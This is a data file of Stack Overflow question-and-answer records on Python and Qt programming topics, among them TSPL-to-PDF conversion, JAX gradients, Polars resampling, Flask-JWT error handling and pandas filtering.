79,548,517 | 2025-4-1 | https://stackoverflow.com/questions/79548517/how-to-use-redmon-for-generating-multiple-outputs-tspl-and-pdf | I have printer TSC TE 210. I created virtual printer on a RedMon port and installed TSC driver on it. I am able to generate printfile.prn file using redmon (redirecting output to python, that will edit the data and create .prn file), that has TSPL commands it it, e.g.: SIZE 97.6 mm, 50 mm GAP 3 mm, 0 mm DIRECTION 0,0 REFERENCE 0,0 OFFSET 0 mm SET PEEL OFF SET CUTTER OFF SET PARTIAL_CUTTER OFF SET TEAR ON CLS BITMAP 361,170,50,32,1,˙đ˙˙˙˙˙˙˙đ˙˙ü ˙˙˙˙˙˙ TEXT 586,152,"2",180,1,1,1,"1234AA" PRINT 1,1 Everything is good. I can edit the TSPL commands, add something etc, and then send it to real printer using copy printfile.prn /B "TSC TE210" (on windows) It works, because the generated .prn file has TSPL commands, and I am also sending TSPL commands to the printer for real printing. The problem is, I would like to create also PDF. I am able to do it! Also use redmon, but instead of forwarding it to python script, I used PostScript, that can indeed generate the pdf file. This virtual printer used PostScript driver. However, how to generate both files (.prn having TSPL), and .pdf file in the same time? I want to be super user friendly, print it once, and generate TSPL and pdf in the same time. What is limiting me? The thing I mentioned - using first approach, the virtual printer has to have TSC driver installed, that is why it generated TSPL commands. Second virtual printer has PS driver installed, that is why it generated PostScript file, that can be changed into PDF. But I can not have both driver installed on the same RedMon virtual printer. Any idea how to do it? I know I can create a script, that just take TSPL commands from the first approach, and somehow create PDF step by step. But that is really much work. I can probably create just PDF using PostScript, and try to work only with PDF, when everything is edited, try to print PDF on thermal printer, but thermal printers really dont like PDF, since the size of labels is not A4. And I would love to keep the native TSPL format for easier edits. Any solution, where I can use same data to create TSPL and PDF in one run? TLTR: I can create TSPL or PDF files using RedMon, but can not do both in the same run. Any trick that could do it? EDIT 2.4.2025: I was able to create python script that will visualize the TSPL bitmap using plt library. Thanks to the @K J answer, I understood that I have to scale the width by 8. However, only one of the 4 bitmaps looks good. Also I dont know how to make them visible together: import numpy as np import matplotlib.pyplot as plt from PIL import Image import re bitmap_parameters = [] bitmap_lines = [] with open("TSPL.prn", "rb") as f: for line in f.readlines(): if line.startswith(b"BITMAP"): match = re.match(br'BITMAP (\d{1,5}),(\d{1,5}),(\d{1,5}),(\d{1,5}),(\d{1,5}),', line) if match: bitmap_parameters.append(match.groups()) bitmap_lines.append( re.sub(br'BITMAP \d{1,5},\d{1,5},\d{1,5},\d{1,5},\d{1,5},', b'', line) ) fig, axes = plt.subplots(1, len(bitmap_lines)) if len(bitmap_lines) == 1: axes = [axes] for i in range(len(bitmap_lines)): bitmap_bytes = bitmap_lines[0] width, height = int(bitmap_parameters[i][2]), int(bitmap_parameters[i][3]) width *= 8 bitmap = np.frombuffer(bitmap_bytes, dtype=np.uint8) bitmap = np.unpackbits(bitmap)[:width * height] try: bitmap = bitmap.reshape((height, width)) except: print("error") continue axes[i].imshow(bitmap, cmap="gray", interpolation="nearest") axes[i].axis("off") plt.show() Result: | This is a good question and from long discussions we get to the hub of an XY problem. Only one print type (text, vector or raster) at a time, can be one applications printout. In this case the desire is Textual TSPL (203 DPI: 1 mm = 8 dots) and vector PDF 1000 sub units = 1/72" (printer point). PDF is not a good source format as many source constructs that are needed are discarded. Thus the simpler conversion will be TSPL to PDFL. The way to convert one format to another is first replace similar functions in large blocks. The header in a TSPL file is something like: So the first challenge is positional units are counted as 8 per mm and the direction in this case is upside down, plus compared to most conventions inverted. This poses needing programming to convert such placements and bitmaps. I am working on what text syntax is needed for the programming as it does not matter if C++#.js or Python.py in PDF term it is simply "ANSI" binary text as byte streams. Without correction for scale and colours the result of bitmaps would seem oddly oversized, rotated and negative, however that is easily fixable in terms of simple text values. So at this stage we can replace the text header from this: SIZE 97.6 mm, 50 mm GAP 3 mm, 0 mm DIRECTION 0,0 REFERENCE 0,0 OFFSET 0 mm SET PEEL OFF SET CUTTER OFF SET PARTIAL_CUTTER OFF SET TEAR ON CLS BITMAP 25,50,92,112,1, ÿÿÿÿ To something like this where we use the common up and downscale by 8 dots. Basically we multiply the 92 x 8 = /Width 736 ! First we set the page (object 3) to 97.6 x 8 = 781 width and 50 x 8 high = 400 dots, and reserve objects 5,6 & 7 for the 3 bitmaps. %PDF-1.6 %Åѧ¡ 1 0 obj <</Type/Catalog/Pages 2 0 R>> endobj 2 0 obj <</Type/Pages/Count 1/Kids[3 0 R]>> endobj 3 0 obj <</Type/Page/Parent 2 0 R/MediaBox[0 0 781 400]/UserUnit 0.3545/Contents 4 0 R /Resources<</XObject<</Im1 5 0 R/Im2 6 0 R/Im3 7 0 R>>>>/Rotate 180>> endobj 4 0 obj <</Length 103>> stream q 736 0 0 112 25 50 cm /Im1 Do Q q 400 0 0 32 361 170 cm /Im2 Do Q q 736 0 0 168 25 210 cm /Im3 Do Q endstream endobj 5 0 obj <</Type/XObject/Subtype/Image/BitsPerComponent 1/ColorSpace[/Indexed/DeviceRGB 1<000000FFFFFF>]/Width 736/Height 112/Length 10304>> stream ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ... 10 KB image endstream endobj 6 0 obj similar but different width to 5 (1600 bytes) stream ÿÿÿÿÿÿÿÿÿÿ... 1.56 KB image endstream endobj 7 0 obj similar but different width to 5 (15456 bytes) stream ÿÿÿÿÿÿÿÿÿÿ... 15 KB image endstream endobj Changing colours is fairly simple as we just say black is white: /ColorSpace[/Indexed/DeviceRGB 1<000000FFFFFF>] We can also set a page scale to roughly 203.10 units per inch and rotate by 180. /Rotate 180/Type/Page/UserUnit 0.3545 (this addition requires we update header to 1.6) So far so good the images are well placed Just to round up on the final result: When the bitmaps have been placed, each object will have a decimal based starting address which we use for the trailer index. The easiest way if using a command line to write the PDF is measure file byte length "position" after each step and before the next and keep an array of those end/start points! The numbers need to account for the variable entries so if there were 3 images as object 5, 6 & 7 then the last object will have been 7 0 obj but in this format the Xref table always starts with a blank 65536 f \n entry. The line end is either \r\n or a spaced \n to ensure index lines are always 20 characters ! So in this case the xref starts with 0 8 and ends with a similar <</Size 8/Root 1 0 R>> also you need to change the startxref decimal address value to the start position of xref ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ endstream endobj xref 0 8 0000000000 65536 f 0000000015 00000 n 0000000060 00000 n 0000000111 00000 n 0000000277 00000 n 0000000429 00000 n 0000010898 00000 n 0000012661 00000 n trailer <</Size 8/Root 1 0 R>> startxref 28283 %%EOF | 1 | 1 |
79,550,040 | 2025-4-2 | https://stackoverflow.com/questions/79550040/why-is-jax-treating-floating-point-values-as-tracers-rather-than-concretizing-th | I am doing some physics simulations using jax, and this involves a function called the Hamiltonian defined as follows: # Constructing the Hamiltonian @partial(jit, static_argnames=['n', 'omega']) def hamiltonian(n: int, omega: float): """Construct the Hamiltonian for the system.""" H = omega * create(n) @ annhilate(n) return H and then a bigger function def solve_diff(n, omega, kappa, alpha0): that is defined as follows: @partial(jit, static_argnames=['n', 'omega']) def solve_diff(n, omega, kappa, alpha0): # Some functionality that uses kappa and alpha0 H = hamiltonian(n, omega) # returns an expectation value When I try to compute the gradient of this function using jax.grad n = 16 omega = 1.0 kappa = 0.1 alpha0 = 1.0 # Compute gradients with respect to omega, kappa, and alpha0 grad_population = grad(solve_diff, argnums=(1, 2, 3)) grads = grad_population(n, omega, kappa, alpha0) print(f"Gradient w.r.t. omega: {grads[0]}") print(f"Gradient w.r.t. kappa: {grads[1]}") print(f"Gradient w.r.t. alpha0: {grads[2]}") it outputs the following error: ValueError: Non-hashable static arguments are not supported. An error occurred while trying to hash an object of type <class 'jax._src.interpreters.ad.JVPTracer'>, Traced<ShapedArray(float32[], weak_type=True)>with<JVPTrace> with primal = 1.0 tangent = Traced<ShapedArray(float32[], weak_type=True)>with<JaxprTrace> with pval = (ShapedArray(float32[], weak_type=True), None) recipe = LambdaBinding(). The error was: TypeError: unhashable type: 'JVPTracer' Though, running solve_diff(16,1.0,0.1,1.0) on its own works as expected. Now if I remove omega from the list of static variables for both the hamiltonian function and the solve_diff, the grad is output as expected. This is confusing me, because I no longer know what qualifies as static or dynamic variables anymore, from the definition that static variables does not change between function calls, both n and omega are constants and indeed should not change between function calls. | The fundamental issue is that you cannot differentiate with respect to a static variable, and if you try to do so you will get the error you observed. This is confusing me, because I no longer know what qualifies as static or dynamic variables anymore, from the definition that static variables does not change between function calls In JAX, the term "static" does not have to do with whether the variable is changed between function calls. Rather, a static variable is a variable that does not participate in tracing, which is the mechanism used to compute transformations like vmap, grad, jit, etc. When you differentiate with respect to a variable, it is no longer static because it is participating in the autodiff transformation, and trying to treat it as static later in the computation will lead to an error. For a discussion of transformations, tracing, and related concepts, I'd start with JAX Key Concepts: transformations. | 1 | 1 |
79,549,881 | 2025-4-2 | https://stackoverflow.com/questions/79549881/how-to-resample-a-dataset-to-achieve-a-uniform-distribution | I have a dataset with a schema like: df = pl.DataFrame( { "target": [ [1.0, 1.0, 0.0], [1.0, 1.0, 0.1], [1.0, 1.0, 0.2], [1.0, 1.0, 0.8], [1.0, 1.0, 0.9], [1.0, 1.0, 1.0], ], "feature": ["a", "b", "c", "d", "e", "f"], }, schema={ "target": pl.Array(pl.Float32, 3), "feature": pl.String, }, ) If I make a histogram of the target-z values it looks like: I want to resample the data so its flat along z. I managed to do it in a hacky-many-steps way (also very slow). I was wondering if people could suggest a cleaner (and more efficient) way? What I am doing is: Find the bin edges of said histogram: bins = 2 # Use e.g. 100 or larger in reality z = df.select(z=pl.col("target").arr.get(2)) z_min = z.min() z_max = z.max() breaks = np.linspace(z_min, z_max, num=bins+1) Find how many counts are in the bin with the fewest counts: counts = ( df.with_columns(bin=pl.col("target").arr.get(2).cut(breaks)) .with_columns(counter=pl.int_range(pl.len()).over("bin")) .group_by("bin") .agg(pl.col("counter").max()) .filter(pl.col("counter") > 0) # <- Nasty way of filtering the (-inf, min] bin .select(pl.col("counter").min()) ).item() Choose only "count" elements on each bin: df = ( df.with_columns(bin=pl.col("target").arr.get(2).cut(breaks)) .with_columns(counter=pl.int_range(pl.len()).over("bin")) .filter(pl.col("counter") <= counts) .select("target", "feature") ) This gives me: Do people have any suggestions? | I don't think you can avoid those three steps for resampling (although depending on your use case you could try to transform the data instead) You can optimize that code a bit though, import polars as pl import numpy as np # Some random mocked data rng = np.random.default_rng() df = pl.DataFrame({'z': rng.lognormal(size=100_000) - 0.5}).filter(pl.col('z').is_between(0.0, 1.0)) z = pl.col('z') # Create the bins using polars, and only once cuts = df.select(pl.linear_space(z.min(), z.max(), 99, closed='none'))['z'] df = df.with_columns(bin=z.cut(cuts)) # just use len() instead of range+max() counts = ( df .group_by("bin") .len() .select(pl.col("len").min()) ).item() # take the head of each group or sample result = ( df .group_by('bin') # .head(counts) # You can just use this instead of .map_groups(...sample(counts)), # and head() is closer to what you had in the original, but # taking only the head() may bias the data if the order is not random .map_groups(lambda df: df.sample(counts)) .drop('bin') ) print(result) | 2 | 2 |
79,550,795 | 2025-4-2 | https://stackoverflow.com/questions/79550795/python-dataframe-structure-breaks-when-appending-the-file | I am trying to get user inputs to create a file where users can store website, username, and password in table format whenever users hit a button. I made the function below, and it looks okay to me. However, when a user enters the second and third entries, the data frame structure is broken. Any idea why it happens? You may see the print result each time adding a row to my data. Code: from tkinter import * import pandas as pd import os def save_password(): website_name = input("Website: ") username = input("Username: ") password = input("Password: ") # password_details = f"website: {website_name};username: {username};password: {password}" input_entries_dict = {"Website": [website_name], "Username/Email": [username], "Password": [password]} input_entries_df = pd.DataFrame(input_entries_dict) if not os.path.isfile("MyPassword_test.txt"): input_entries_df.to_csv("MyPassword_test.txt", index=False) print(input_entries_df) else: data = pd.read_csv("MyPassword_test.txt") data = data._append(input_entries_df, ignore_index=True, sort=True) print(data) data.to_csv("MyPassword_test.txt", sep=";", index=False) save_password() Outputs for each time: First entry: ALL FINE Website Username/Email Password 0 d32d23 f7324f2 f3223f2 Second Entry: Column names are shifted Password Username/Email Website 0 f3223f2 f7324f2 d32d23 1 ddwefddsfds5 32fwefw5 48sfd4s Third Entry:Colum of "Password;Username/Email;Website" created! Password Password;Username/Email;Website Username/Email Website 0 NaN f3223f2;f7324f2;d32d23 NaN NaN 1 NaN ddwefddsfds5;32fwefw5;48sfd4s NaN NaN 2 154152 NaN f32f23f23 2f23f2332 | The confusion is caused by writing the .CSV with a ; separator but ignoring this on reading. Use: else: data = pd.read_csv("MyPassword_test.txt") data = pd.concat([data, input_entries_df], ignore_index=True) print(data) data.to_csv("MyPassword_test.txt", index=False) | 1 | 2 |
79,550,287 | 2025-4-2 | https://stackoverflow.com/questions/79550287/python-descriptors-on-readonly-attributes | I want to refactor a big part of my code into a generic descriptor for read only attribute access. The following is an example of property based implementation class A: def __init__(self, n): self._n = n self._top = -1 @property def n(self): return self._n @property def top(self): return self._top def increase(self): self._top += 1 you see I can initialize my A class and increase self._top but not to let user set a.top by omitting property setter method a = A(7) a.top Out[25]: -1 a.increase() a.top Out[27]: 0 if I do a.top = 4, it will give me an error AttributeError: property 'top' of 'A' object has no setter which is expected. Now, I want to refactor this logic into a descriptor class ReadOnly: def __init__(self): self._name = None def __set_name__(self, owner, name): self._name = name def __get__(self, instance, owner): if instance is None: return self return instance.__dict__[self._name] def __set__(self, instance, value): raise AttributeError("Can't set attribute") def __delete__(self, instance): raise AttributeError("Can't delete attribute") class A: n = ReadOnly() top = ReadOnly() def __init__(self, n): self.n = n self.top = -1 def increase(self): self.top += 1 Well, this doesn't work. I can't even initialize the class A anymore, cause in __init__ it will set n and top immediately and prevent my from initialize. How to write this logic from property into descriptor? P.S. Thank @chepner for this solution. This is what I'm looking for. I made it work. One last thing, if I have a attribute is a list say class Stack: S = ReadOnly() n = ReadOnly() top = ReadOnly() def __init__(self, n): self._S = [None] * n self._n = n self._top = -1 # python offset 1 Now I can't change self.top anymore >>> s = Stack(4) >>> s.S [None, None, None, None] Nor I can change s >>> s.S = [1, 3] # not allowed anymore. Great! But I can still change an element in the list >>> s.S[3] = 3 [None, None, None, 3] How can I prevent list element changes? | Instead of disallowing all modifications, simply check if the attribute exists on instance before creating it. If it already exists, raise the AttributeError. Otherwise, let the attribute be created. def __set__(self, instance, value): if self._name in instance.__dict__: raise AttributeError("Can't set attribute") instance.__dict__[self._name] = value Also, if I remember correctly, -- Update: I did not. If the class attribute has __get__ and __set__, it takes priority over an instance attribute of the same name. Here is a good reference. However, I would still give the instance attribute a different name for clarity. --you need to use a different name for the underlying private attribute so that you don't shadow the descriptor. def __set_name__(self, owner, name): self._name = "_" + name | 1 | 2 |
79,550,276 | 2025-4-2 | https://stackoverflow.com/questions/79550276/how-to-load-a-pdf-from-bytes-instead-of-file-in-pyside6 | I'm trying to display a PDF I created (using fpdf2) in a Pyside6 app. There seems to be two roads there: I can use QWebEngineView with plugins enabled, in which I can inject the PDF raw bytes, which works. It is not ideal for me since there's a lot of UI involved ; I'd like something cleaner. Or I can use QPdfView. That widgets takes an QPdfDocument object from which it reads from. Unfortunately, QPdfDocument only have a .load() function that takes a filename. Since I'm looking to avoid disk writes there, I'm not interested in temporarly saving the file to disk to show it on the GUI. There's two signatures on the .load() function tho : Supported signatures: PySide6.QtPdf.QPdfDocument.load(PySide6.QtCore.QIODevice, /) PySide6.QtPdf.QPdfDocument.load(str, /) Here's the thing: I can't instantiate a QIODevice from Python, so I can't feed it PDF's bytes like a buffer (there's a .write() function that looks interesting). I've tried using BytesIO (from io package), but no luck there. Is there a way to create a QPdfDocument object from a PDF file's bytes? Thanks for your help! | You need to use a QBuffer (which inherits QIODevice) backed by a QByteArray containing the pdf bytes data. The buffer doesn't take ownership of the data, and the document doesn't take ownership of the buffer, so you need to ensure these objects are kept alive whilst the pdf is loading. A slot connected to the statusChanged signal can be used to clean up the objects once the document is loaded (or if an error occurs). A basic example that implements all that is given below (just provide a pdf file-path as a command-line argument to test it). (PS: whilst testing, I found that the viewer seg-faults on exit if a document has successfully loaded. This happens even when loading from a file-path. The issue is fairly harmless, and it can be easily fixed by explicitly closing the document before closing down the application. I get the same problem using either PySide-6.8.3 or PyQt-6.8.1 with Qt-6.8.3 on Linux, so it seems to be caused by a Qt bug. It's possible that other versions/platforms aren't affected). DEMO: import sys from PySide6 import QtCore, QtWidgets, QtPdf, QtPdfWidgets # from PyQt6 import QtCore, QtWidgets, QtPdf, QtPdfWidgets class PdfView(QtPdfWidgets.QPdfView): def __init__(self, parent=None): super().__init__(parent) self.setDocument(QtPdf.QPdfDocument(self)) self.document().statusChanged.connect(self.handleStatusChanged) def loadData(self, data): self._data = QtCore.QByteArray(data) self._buffer = QtCore.QBuffer(self._data) self._buffer.open(QtCore.QIODeviceBase.OpenModeFlag.ReadOnly) self.document().load(self._buffer) def handleStatusChanged(self, status): print(status) if (status == QtPdf.QPdfDocument.Status.Ready or status == QtPdf.QPdfDocument.Status.Error): self._buffer.close() del self._buffer, self._data def closeEvent(self, event): # prevent seg-fault on exit self.document().close() if __name__ == '__main__': app = QtWidgets.QApplication(['Test']) pdfview = PdfView() pdfview.setGeometry(600, 100, 800, 600) # FOR TESTING PURPOSES ONLY # get sample pdf bytes data with open(sys.argv[1], 'rb') as stream: pdfview.loadData(stream.read()) pdfview.show() app.exec() | 2 | 1 |
79,549,767 | 2025-4-2 | https://stackoverflow.com/questions/79549767/create-a-new-file-moving-an-existing-file-out-of-the-way-if-needed | What is the best way to create a new file in Python, moving if needed an existing file with the same name to a different path? While you could do if os.path.exists(name_of_file): os.move(name_of_file, backup_name) f = open(name_of_file, "w") that has TOCTOU issues (e.g. multiple processes could try and create the file at the same time). Can I avoid those issues using only the standard library (preferably), or is there a package which handles this. You can assume a POSIX file system. | In a loop: Open the file exclusively (open(..., "x") or O_CREAT|O_EXCL). If that fails with FileExistsError (EEXIST), then atomically os.rename the existing file to something else. Try again. If that renaming fails with anything other than FileExistsError (ENOENT, meaning someone else removed or renamed the offending file before you did), break the loop and fail. (It's not clear to me how your competing processes can know it is OK to move the existing file out of the way or not, but presumably you've knowledge of your use case that I do not.) | 2 | 3 |
79,548,581 | 2025-4-1 | https://stackoverflow.com/questions/79548581/jwt-token-expiration-handling-causing-500-error-in-flask-jwt-extended-and-flask | Problem: I'm building a Flask backend using flask-restful, flask-jwt-extended, and PostgreSQL. When testing JWT token expiration via Postman, expired tokens consistently result in a 500 Internal Server Error instead of a 401 Unauthorized response. Desired Behavior: When a JWT token expires, my API should return a JSON response: {"message": "Token has expired"} Currently, an expired token results in this error: {"message": "Internal Server Error"} Server Logs Traceback: jwt.exceptions.ExpiredSignatureError: Signature has expired Relevent Code: Flask App Initialization (init.py) from flask import Flask, jsonify from flask_jwt_extended import JWTManager from flask_restful import Api from flask_cors import CORS from flask_sqlalchemy import SQLAlchemy from flask_migrate import Migrate import os from dotenv import load_dotenv load_dotenv() app = Flask(__name__) CORS(app, supports_credentials=True) app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL') app.config['JWT_SECRET_KEY'] = os.getenv('JWT_SECRET_KEY', 'temporary_secret') jwt = JWTManager(app) db = SQLAlchemy(app) api = Api(app) migrate = Migrate(app, db) # JWT error handlers @jwt.expired_token_loader def expired_token_callback(jwt_header, jwt_payload): return jsonify({"message": "Token has expired"}), 401 @jwt.invalid_token_loader def invalid_token_callback(error): return jsonify({"message": "Invalid token"}), 401 @jwt.unauthorized_loader def unauthorized_callback(error): return jsonify({"message": "Missing or invalid Authorization header"}), 401 if __name__ == "__main__": app.run(host="0.0.0.0", port=5000, debug=True) Auth Resource (auth_resource.py) from flask_restful import Resource, reqparse from flask_jwt_extended import ( create_access_token, create_refresh_token, jwt_required, get_jwt_identity ) from werkzeug.security import check_password_hash from datetime import timedelta from app.models import User parser = reqparse.RequestParser() parser.add_argument('username', required=True) parser.add_argument('password', required=True) class LoginResource(Resource): def post(self): data = parser.parse_args() user = User.query.filter_by(username=data['username']).first() if user and check_password_hash(user.password_hash, data['password']): access_token = create_access_token(identity=user.id, expires_delta=timedelta(seconds=30)) refresh_token = create_refresh_token(identity=user.id, expires_delta=timedelta(minutes=2)) return {'access_token': access_token, 'refresh_token': refresh_token}, 200 return {'msg': 'Invalid credentials'}, 401 class ProtectedResource(Resource): @jwt_required() def get(self): identity = get_jwt_identity() return {'logged_in_as': identity}, 200 Testing Approach & Results (Postman) Login works (200 OK), returns tokens. Access protected resource (200 OK) initially with valid token. Wait 30 seconds (token expiration), then call protected resource again. Expected: 401 {"message": "Token has expired"} Actual: 500 Internal Server Error Server Logs: ERROR in app: Exception on /api/protected [GET] Traceback (most recent call last): File "/usr/local/lib/python3.11/site-packages/flask/app.py", line 917, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python3.11/site-packages/flask/app.py", line 902, in dispatch_request return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) File "/usr/local/lib/python3.11/site-packages/flask_restful/__init__.py", line 604, in dispatch_request resp = meth(*args, **kwargs) File "/usr/local/lib/python3.11/site-packages/flask_jwt_extended/view_decorators.py", line 167, in decorator verify_jwt_in_request( File "/usr/local/lib/python3.11/site-packages/flask_jwt_extended/utils.py", line 128, in decode_token return jwt_manager._decode_jwt_from_config(encoded_token, csrf_value, allow_expired) File "/usr/local/lib/python3.11/site-packages/jwt/api_jwt.py", line 363, in _validate_exp raise ExpiredSignatureError("Signature has expired") jwt.exceptions.ExpiredSignatureError: Signature has expired What I've Tried without success: Implemented JWT global error handlers (expired_token_loader). Verified correct registration of JWT callbacks. Simplified the endpoint code to remove internal exception handling (as JWT errors should be handled globally). Fully rebuilt Docker containers multiple times to ensure fresh deployment. Questions Why isn't my global expired_token_loader capturing the expired token exceptions from the decorator? Is there an error in the way I've configured flask_jwt_extended with flask_restful that prevents global handlers from triggering? What steps can I take to isolate or debug the issue further? Environment Details Python: 3.11 (Dockerized) Flask: latest Flask-JWT-Extended: latest Flask-Restful: latest PostgreSQL database (Dockerized) Docker Compose setup for backend, frontend, and database | Figured out that I had to force handling JWT exceptions globally: Configured Flask and Flask-RESTful to propagate JWT exceptions correctly by adding the following code to init.py: app.config['PROPAGATE_EXCEPTIONS'] = True # Propagate exceptions to the client api.handle_errors = False # Disable Flask-RESTful This provided the results I was looking for and I successfully tested the JWT lifecycle: Login: Issued JWT tokens via /api/login. Valid Token: Accessed protected resource successfully. Expired Token: Received expected 401 error ("Token has expired"). Token Refresh: Successfully refreshed JWT token via /api/refresh. New Token: Validated new token with protected endpoint access. Sources for the developed solution: https://github.com/vimalloc/flask-jwt-extended/issues/308 https://github.com/vimalloc/flask-jwt-extended/issues/86 https://github.com/vimalloc/flask-jwt-extended/issues/83 https://github.com/vimalloc/flask-jwt-extended/blob/main/flask_jwt_extended/jwt_manager.py#L81 | 2 | 1 |
79,550,403 | 2025-4-2 | https://stackoverflow.com/questions/79550403/get-a-row-subset-of-a-pandas-dataframe-based-on-conditions-with-query | I would like to gain a subset of a Pandas Dataframe based on query, if possible giving several conditions based on column values where only rows have to be selected until conditions appear for the first time. Probably this is nothing new. I do just not find the right answers from other posts. The example Dataframe: import pandas as pd df_GPS = pd.DataFrame([['2024-06-21 06:22:38', 22958, 605.968389, 1, 2, 1], ['2024-06-21 06:22:39', 22959, 606.009398, 3, 0, 1], ['2024-06-21 06:22:40', 22960, 605.630573, 1, 2, 0], ['2024-06-21 06:22:41', 22961, 605.476367, 3, 3, 0], ['2024-06-21 06:22:42', 22962, 605.322161, 2, 1, 1], ['2024-06-21 06:22:43', 22963, 605.268389, 4, 1, 0], ['2024-06-21 06:22:44', 22964, 605.559398, 1, 3, 1], ['2024-06-21 06:22:45', 22965, 606.630573, 2, 9 , 0], ['2024-06-21 06:22:46', 22966, 607.476367, 15, 13, 3], ['2024-06-21 06:22:47', 22967, 609.322161, 23, 19, 12], ['2024-06-21 06:22:48', 22968, 607.155939, 20, 21, 16], ['2024-06-21 06:22:49', 22969, 606.763057, 18, 14, 8], ['2024-06-21 06:22:50', 22970, 605.333781, 1, 1, 1], ['2024-06-21 06:22:50', 22971, 604.333781, 15, 1, 1] ], columns=['time', '__UTCs__','Altitude', 's01[m]', 's5.5[m]', 's10[m]']) df_GPS time __UTCs__ Altitude s01[m] s5.5[m] s10[m] 0 2024-06-21 06:22:38 22958 605.968389 1 2 1 1 2024-06-21 06:22:39 22959 606.009398 3 0 1 2 2024-06-21 06:22:40 22960 605.630573 1 2 0 3 2024-06-21 06:22:41 22961 605.476367 3 3 0 4 2024-06-21 06:22:42 22962 605.322161 2 1 1 5 2024-06-21 06:22:43 22963 605.268389 4 1 0 6 2024-06-21 06:22:44 22964 605.559398 1 3 1 7 2024-06-21 06:22:45 22965 606.630573 2 9 0 8 2024-06-21 06:22:46 22966 607.476367 15 13 3 9 2024-06-21 06:22:47 22967 609.322161 23 19 12 10 2024-06-21 06:22:48 22968 607.155939 20 21 16 11 2024-06-21 06:22:49 22969 606.763057 18 14 8 12 2024-06-21 06:22:50 22970 605.333781 1 1 1 13 2024-06-21 06:22:50 22971 604.333781 15 1 1 The result I am aiming at looks like: time __UTCs__ Altitude s01[m] s5.5[m] s10[m] 1 2024-06-21 06:22:40 22960 605.630573 1 2 0 2 2024-06-21 06:22:41 22961 605.476367 3 3 0 3 2024-06-21 06:22:42 22962 605.322161 2 1 1 4 2024-06-21 06:22:43 22963 605.268389 4 1 0 5 2024-06-21 06:22:44 22964 605.559398 1 3 1 6 2024-06-21 06:22:45 22965 606.630573 2 9 0 7 2024-06-21 06:22:46 22966 607.476367 15 13 3 I tried with query (what I thought should be the most elegant way): df_sub = df_GPS.query('__UTCs__ >= 22960 & s01[m] < 16') which gives an UndefinedVariableError: name 's01' is not defined maybe due to the underlines or the brackets in the column names? How would I define that these are columns of df_GPS? On the other side df_sub = df_GPS[((df_GPS['__UTCs__'] >= 22960) & (df_GPS['s01[m]'] < 16))].copy() Which results in: time __UTCs__ Altitude s01[m] s5.5[m] s10[m] 2 2024-06-21 06:22:40 22960 605.630573 1 2 0 3 2024-06-21 06:22:41 22961 605.476367 3 3 0 4 2024-06-21 06:22:42 22962 605.322161 2 1 1 5 2024-06-21 06:22:43 22963 605.268389 4 1 0 6 2024-06-21 06:22:44 22964 605.559398 1 3 1 7 2024-06-21 06:22:45 22965 606.630573 2 9 0 8 2024-06-21 06:22:46 22966 607.476367 15 13 3 12 2024-06-21 06:22:50 22970 605.333781 1 1 1 13 2024-06-21 06:22:50 22971 604.333781 15 1 1 works in principle but leaves all rows meeting the last criterion. I want to stop the query after the first finding of all meeting criteria. Is there a way without undertaking a groupby of ['s01[m]']? The last way I tried is with loc. This would also reset the index but results in the same row content: df_sub = df_GPS.loc[(df_GPS['__UTCs__'] >= 0) & (df_GPS['s01[m]'] <= 16)] time __UTCs__ Altitude s01[m] s5.5[m] s10[m] 0 2024-06-21 06:22:38 22958 605.968389 1 2 1 1 2024-06-21 06:22:39 22959 606.009398 3 0 1 2 2024-06-21 06:22:40 22960 605.630573 1 2 0 3 2024-06-21 06:22:41 22961 605.476367 3 3 0 4 2024-06-21 06:22:42 22962 605.322161 2 1 1 5 2024-06-21 06:22:43 22963 605.268389 4 1 0 6 2024-06-21 06:22:44 22964 605.559398 1 3 1 7 2024-06-21 06:22:45 22965 606.630573 2 9 0 8 2024-06-21 06:22:46 22966 607.476367 15 13 3 12 2024-06-21 06:22:50 22970 605.333781 1 1 1 13 2024-06-21 06:22:50 22971 604.333781 15 1 1 How may I finish the query? with a while-loop? | You can use cummin to compute your second condition: df_GPS[df_GPS['__UTCs__'].ge(22960) & df_GPS['s01[m]'].lt(16).cummin()] Output: time __UTCs__ Altitude s01[m] s5.5[m] s10[m] 2 2024-06-21 06:22:40 22960 605.630573 1 2 0 3 2024-06-21 06:22:41 22961 605.476367 3 3 0 4 2024-06-21 06:22:42 22962 605.322161 2 1 1 5 2024-06-21 06:22:43 22963 605.268389 4 1 0 6 2024-06-21 06:22:44 22964 605.559398 1 3 1 7 2024-06-21 06:22:45 22965 606.630573 2 9 0 8 2024-06-21 06:22:46 22966 607.476367 15 13 3 Intermediates: __UTCs__ s01[m] __UTCs__ >= 22960 s01[m] < 16 (s01[m] < 16).cummin() & 0 22958 1 False True True False 1 22959 3 False True True False 2 22960 1 True True True True 3 22961 3 True True True True 4 22962 2 True True True True 5 22963 4 True True True True 6 22964 1 True True True True 7 22965 2 True True True True 8 22966 15 True True True True 9 22967 23 True False False False 10 22968 20 True False False False 11 22969 18 True False False False 12 22970 1 True True False False 13 22971 15 True True False False A potentially more robust approach if you have many conditions and want the first stretch of all True: m = df_GPS['__UTCs__'].ge(22960) & df_GPS['s01[m]'].lt(16) m2 = m.ne(m.shift(fill_value=m.iloc[0])).cumsum().eq(1) & m out = df_GPS[m2] Intermediates: __UTCs__ s01[m] m shift ne cumsum eq(1) & m 0 22958 1 False False False 0 False False 1 22959 3 False False False 0 False False 2 22960 1 True False True 1 True True 3 22961 3 True True False 1 True True 4 22962 2 True True False 1 True True 5 22963 4 True True False 1 True True 6 22964 1 True True False 1 True True 7 22965 2 True True False 1 True True 8 22966 15 True True False 1 True True 9 22967 23 False True True 2 False False 10 22968 20 False False False 2 False False 11 22969 18 False False False 2 False False 12 22970 1 True False True 3 False False 13 22971 15 True True False 3 False False | 2 | 2 |
